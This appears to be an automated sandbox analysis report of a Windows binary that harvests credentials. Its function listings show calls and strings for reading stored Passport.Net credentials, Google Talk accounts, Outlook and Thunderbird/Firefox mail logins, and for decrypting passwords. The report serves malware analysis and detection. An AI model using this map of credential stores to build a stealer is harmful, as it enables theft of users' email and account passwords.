                                            • Part of subcall function 00406AF3: _mbscat.MSVCRT ref: 00406B0B
                                          • _mbscat.MSVCRT ref: 0040355F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscatmemset$Close_mbscpystrlen
                                          • String ID: InstallPath$Software\Group Mail$fb.dat
                                          • API String ID: 3071782539-966475738
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                            • Part of subcall function 004045D6: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                            • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                            • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                          • CredReadA.ADVAPI32(Passport.Net\*,00000004,00000000,?,?,00000000), ref: 0040F09E
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F123
                                          • strlen.MSVCRT ref: 0040F133
                                          • _mbscpy.MSVCRT ref: 0040F144
                                          • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F151
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharCredFreeLocalMultiReadWidestrlen
                                          • String ID: Passport.Net\*
                                          • API String ID: 4000595657-3671122194
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                          • String ID:
                                          • API String ID: 2054149589-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00408043: memset.MSVCRT ref: 004080A5
                                            • Part of subcall function 00408043: memset.MSVCRT ref: 004080B9
                                            • Part of subcall function 00408043: memset.MSVCRT ref: 004080D3
                                            • Part of subcall function 00408043: memset.MSVCRT ref: 004080E8
                                            • Part of subcall function 00408043: GetComputerNameA.KERNEL32(?,?), ref: 0040810A
                                            • Part of subcall function 00408043: GetUserNameA.ADVAPI32(?,?), ref: 0040811E
                                            • Part of subcall function 00408043: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040813D
                                            • Part of subcall function 00408043: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00408152
                                            • Part of subcall function 00408043: strlen.MSVCRT ref: 0040815B
                                            • Part of subcall function 00408043: strlen.MSVCRT ref: 0040816A
                                            • Part of subcall function 00408043: memcpy.MSVCRT ref: 0040817C
                                            • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                          • memset.MSVCRT ref: 00408392
                                            • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
                                          • memset.MSVCRT ref: 004083E3
                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00408421
                                          • RegCloseKey.ADVAPI32(?), ref: 00408448
                                          Strings
                                          • Software\Google\Google Talk\Accounts, xrefs: 00408363
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                          • String ID: Software\Google\Google Talk\Accounts
                                          • API String ID: 2959138223-1079885057
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Cursor_mbsicmpqsort
                                          • String ID: /nosort$/sort
                                          • API String ID: 882979914-1578091866
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0041067E: LoadLibraryA.KERNEL32(shell32.dll,0041073A,00000104), ref: 0041068C
                                            • Part of subcall function 0041067E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004106A1
                                          • memset.MSVCRT ref: 00410780
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 004107E9
                                          • _mbscpy.MSVCRT ref: 004107F7
                                            • Part of subcall function 00406E4C: GetVersionExA.KERNEL32(00451168,0000001A,00410749,00000104), ref: 00406E66
                                          Strings
                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0041079B, 004107AB
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                          • API String ID: 889583718-2036018995
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindResourceA.KERNEL32(?,?,?), ref: 004105EA
                                          • SizeofResource.KERNEL32(?,00000000), ref: 004105FB
                                          • LoadResource.KERNEL32(?,00000000), ref: 0041060B
                                          • LockResource.KERNEL32(00000000), ref: 00410616
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Resource$FindLoadLockSizeof
                                          • String ID:
                                          • API String ID: 3473537107-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.MSVCRT ref: 0041036C
                                            • Part of subcall function 0040735C: sprintf.MSVCRT ref: 00407394
                                            • Part of subcall function 0040735C: memcpy.MSVCRT ref: 004073A7
                                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410390
                                          • memset.MSVCRT ref: 004103A7
                                          • GetPrivateProfileStringA.KERNEL32(?,?,0044551F,?,00002000,?), ref: 004103C5
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                          • String ID:
                                          • API String ID: 3143880245-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??2@
                                          • String ID:
                                          • API String ID: 1033339047-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@mallocmemcpy
                                          • String ID:
                                          • API String ID: 3831604043-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00406D65: memset.MSVCRT ref: 00406D6F
                                            • Part of subcall function 00406D65: _mbscpy.MSVCRT ref: 00406DAF
                                          • CreateFontIndirectA.GDI32(?), ref: 00406E44
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CreateFontIndirect_mbscpymemset
                                          • String ID: Arial
                                          • API String ID: 3853255127-493054409
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00401E60: memset.MSVCRT ref: 00401E82
                                            • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401E9B
                                            • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EA9
                                            • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EEF
                                            • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EFD
                                          • _strcmpi.MSVCRT ref: 0040CBE4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$_strcmpimemset
                                          • String ID: /stext
                                          • API String ID: 520177685-3817206916
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00444A5C,00444A45), ref: 00444A7E
                                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00444A5C,00444A45), ref: 00444A92
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00404780: FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                          • LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Library$AddressFreeLoadProc
                                          • String ID:
                                          • API String ID: 145871493-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410407
                                            • Part of subcall function 004102F8: memset.MSVCRT ref: 00410316
                                            • Part of subcall function 004102F8: _itoa.MSVCRT ref: 0041032D
                                            • Part of subcall function 004102F8: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0041033C
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: PrivateProfile$StringWrite_itoamemset
                                          • String ID:
                                          • API String ID: 4165544737-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040ABFF,00000000), ref: 00406ACA
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FreeLibrary.KERNELBASE(?,00403C1D), ref: 00410172
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • EnumResourceNamesA.KERNEL32(?,?,Function_000105DD,00000000), ref: 00410672
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: EnumNamesResource
                                          • String ID:
                                          • API String ID: 3334572018-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindClose.KERNELBASE(?,00407C39,?,?,00000000,.8D,0044373A,*.oeaccount,.8D,?,00000104), ref: 00407D29
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CloseFind
                                          • String ID:
                                          • API String ID: 1863332320-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: PrivateProfileString_mbscmpstrlen
                                          • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                          • API String ID: 3963849919-1658304561
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??2@??3@memcpymemset
                                          • String ID: E$ E$ E
                                          • API String ID: 1865533344-1090515111
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • strlen.MSVCRT ref: 0044269A
                                          • _strncoll.MSVCRT ref: 004426AA
                                          • memcpy.MSVCRT ref: 00442726
                                          • atoi.MSVCRT ref: 00442737
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00442763
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ByteCharMultiWide_strncollatoimemcpystrlen
                                          • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                          • API String ID: 1864335961-3210201812
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                          • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                          • API String ID: 1714764973-479759155
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.MSVCRT ref: 0040E6BB
                                            • Part of subcall function 0040690E: memset.MSVCRT ref: 00406930
                                            • Part of subcall function 0040690E: strlen.MSVCRT ref: 0040693B
                                            • Part of subcall function 0040690E: strlen.MSVCRT ref: 00406949
                                          • memset.MSVCRT ref: 0040E70C
                                          • memset.MSVCRT ref: 0040E728
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,%@,000000FF,?,00000104,?,?,?,?,?,?,0040EC25,?,00000000), ref: 0040E73F
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040EC25,?), ref: 0040E75E
                                          • memset.MSVCRT ref: 0040E7C0
                                          • memset.MSVCRT ref: 0040E7D5
                                          • _mbscpy.MSVCRT ref: 0040E83A
                                          • _mbscpy.MSVCRT ref: 0040E850
                                          • _mbscpy.MSVCRT ref: 0040E866
                                          • _mbscpy.MSVCRT ref: 0040E87C
                                          • _mbscpy.MSVCRT ref: 0040E892
                                          • _mbscpy.MSVCRT ref: 0040E8A8
                                          • memset.MSVCRT ref: 0040E8C2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                          • String ID: $"$$$$$%@$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                          • API String ID: 3137614212-1813914204
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _strcmpi$strlen$_strncoll$atoimemset$memcpy
                                          • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$port$server$signon.signonfilename$true$type$useSecAuth$useremail$username
                                          • API String ID: 594115653-593045482
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0040690E: memset.MSVCRT ref: 00406930
                                            • Part of subcall function 0040690E: strlen.MSVCRT ref: 0040693B
                                            • Part of subcall function 0040690E: strlen.MSVCRT ref: 00406949
                                            • Part of subcall function 004086A5: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,0040EC43,?,00000000,?,?,?,?,?,?), ref: 004086C3
                                            • Part of subcall function 004086A5: CloseHandle.KERNEL32(?,?), ref: 0040870D
                                            • Part of subcall function 00408763: _mbsicmp.MSVCRT ref: 0040879D
                                          • memset.MSVCRT ref: 0040E123
                                          • memset.MSVCRT ref: 0040E138
                                          • _mbscpy.MSVCRT ref: 0040E19F
                                          • _mbscpy.MSVCRT ref: 0040E1B5
                                          • _mbscpy.MSVCRT ref: 0040E1CB
                                          • _mbscpy.MSVCRT ref: 0040E1E1
                                          • _mbscpy.MSVCRT ref: 0040E1F7
                                          • _mbscpy.MSVCRT ref: 0040E20A
                                          • memset.MSVCRT ref: 0040E225
                                          • memset.MSVCRT ref: 0040E23C
                                            • Part of subcall function 00406582: memset.MSVCRT ref: 004065A3
                                            • Part of subcall function 00406582: memcmp.MSVCRT ref: 004065CD
                                          • memset.MSVCRT ref: 0040E29D
                                          • memset.MSVCRT ref: 0040E2B4
                                          • memset.MSVCRT ref: 0040E2CB
                                          • sprintf.MSVCRT ref: 0040E2E6
                                          • sprintf.MSVCRT ref: 0040E2FB
                                          • sprintf.MSVCRT ref: 0040E310
                                          • _strcmpi.MSVCRT ref: 0040E326
                                          • _strcmpi.MSVCRT ref: 0040E33F
                                          • _strcmpi.MSVCRT ref: 0040E358
                                          • _strcmpi.MSVCRT ref: 0040E374
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                          • String ID: C@$encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                          • API String ID: 4171719235-3249434271
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.MSVCRT ref: 004024E7
                                            • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                          • _mbscpy.MSVCRT ref: 00402525
                                          • _mbscpy.MSVCRT ref: 004025EF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscpy$QueryValuememset
                                          • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                          • API String ID: 168965057-606283353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.MSVCRT ref: 0040285B
                                            • Part of subcall function 00402994: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029C5
                                          • _mbscpy.MSVCRT ref: 00402895
                                            • Part of subcall function 00402994: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004029F3
                                          • _mbscpy.MSVCRT ref: 0040296D
                                            • Part of subcall function 0041042B: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402928,?,?,?,?,00402928,?,?), ref: 0041044A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                          • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                          • API String ID: 1497257669-167382505
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • EndDialog.USER32(?,?), ref: 0040F600
                                          • GetDlgItem.USER32(?,000003EA), ref: 0040F618
                                          • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040F637
                                          • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040F644
                                          • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040F64D
                                          • memset.MSVCRT ref: 0040F675
                                          • memset.MSVCRT ref: 0040F695
                                          • memset.MSVCRT ref: 0040F6B3
                                          • memset.MSVCRT ref: 0040F6CC
                                          • memset.MSVCRT ref: 0040F6EA
                                          • memset.MSVCRT ref: 0040F703
                                          • GetCurrentProcess.KERNEL32 ref: 0040F70B
                                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040F730
                                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040F766
                                          • memset.MSVCRT ref: 0040F7BD
                                          • GetCurrentProcessId.KERNEL32 ref: 0040F7CB
                                          • memcpy.MSVCRT ref: 0040F7FA
                                          • _mbscpy.MSVCRT ref: 0040F81C
                                          • sprintf.MSVCRT ref: 0040F887
                                          • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040F8A0
                                          • GetDlgItem.USER32(?,000003EA), ref: 0040F8AA
                                          • SetFocus.USER32(00000000), ref: 0040F8B1
                                          Strings
                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040F881
                                          • {Unknown}, xrefs: 0040F67A
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                          • API String ID: 1428123949-3474136107
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                          • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                          • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                          • LoadCursorA.USER32(00000067), ref: 0040115F
                                          • SetCursor.USER32(00000000,?,?), ref: 00401166
                                          • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                          • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                          • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                          • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                          • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                          • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                          • EndDialog.USER32(?,00000001), ref: 0040121A
                                          • DeleteObject.GDI32(?), ref: 00401226
                                          • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                          • ShowWindow.USER32(00000000), ref: 00401253
                                          • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                          • ShowWindow.USER32(00000000), ref: 00401262
                                          • SetDlgItemTextA.USER32(?,000003EE,00451398), ref: 00401273
                                          • memset.MSVCRT ref: 0040128E
                                          • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                          • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                          • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                          Memory Dump Source
                                          • Source File: 00000014.00000002.756196884.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                          • String ID:
                                          • API String ID: 2998058495-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A6B,?,00404981,?,?,00000000,?,00000000,?), ref: 004047D5
                                          • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047E9
                                          • GetProcAddress.KERNEL32(0045175C,CryptReleaseContext), ref: 004047F5
                                          • GetProcAddress.KERNEL32(0045175C,CryptCreateHash), ref: 00404801
                                          • GetProcAddress.KERNEL32(0045175C,CryptGetHashParam), ref: 0040480D
                                          • GetProcAddress.KERNEL32(0045175C,CryptHashData), ref: 00404819
                                          • GetProcAddress.KERNEL32(0045175C,CryptDestroyHash), ref: 00404825
                                          • GetProcAddress.KERNEL32(0045175C,CryptDecrypt), ref: 00404831
                                          • GetProcAddress.KERNEL32(0045175C,CryptDeriveKey), ref: 0040483D
                                          • GetProcAddress.KERNEL32(0045175C,CryptImportKey), ref: 00404849
                                          • GetProcAddress.KERNEL32(0045175C,CryptDestroyKey), ref: 00404855
                                          Strings
                                          Memory Dump Source
